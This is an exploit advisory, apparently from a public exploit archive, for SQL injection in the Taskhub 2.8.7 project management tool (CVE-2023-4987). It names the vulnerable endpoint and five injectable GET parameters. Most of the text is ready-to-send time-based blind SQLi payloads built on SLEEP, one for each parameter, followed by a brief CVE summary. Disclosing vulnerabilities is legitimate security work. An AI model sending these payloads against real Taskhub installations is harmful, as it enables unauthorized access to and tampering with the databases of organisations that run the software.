Headline
Taskhub 2.8.7 SQL Injection
Taskhub version 2.8.7 suffers from a remote SQL injection vulnerability.
# Exploit Title: taskhub 2.8.7 - SQL Injection# Exploit Author: CraCkEr# Date: 05/09/2023# Vendor: Infinitie Technologies# Vendor Homepage: https://www.infinitietech.com/# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874# Demo: https://taskhub.company/auth# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4987# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /home/get_tasks_listGET parameter 'project' is vulnerable to SQL InjectionGET parameter 'status' is vulnerable to SQL InjectionGET parameter 'user_id' is vulnerable to SQL InjectionGET parameter 'sort' is vulnerable to SQL InjectionGET parameter 'search' is vulnerable to SQL Injectionhttps://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]---Parameter: project (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=Parameter: status (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=Parameter: user_id (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=Parameter: sort (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=Parameter: search (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW---[-] DoneRelated news
CVE-2023-4987
A vulnerability, which was classified as critical, has been found in infinitietech taskhub 2.8.7. Affected by this issue is some unknown functionality of the file /home/get_tasks_list of the component GET Parameter Handler. The manipulation of the argument project/status/user_id/sort/search leads to sql injection. VDB-239798 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.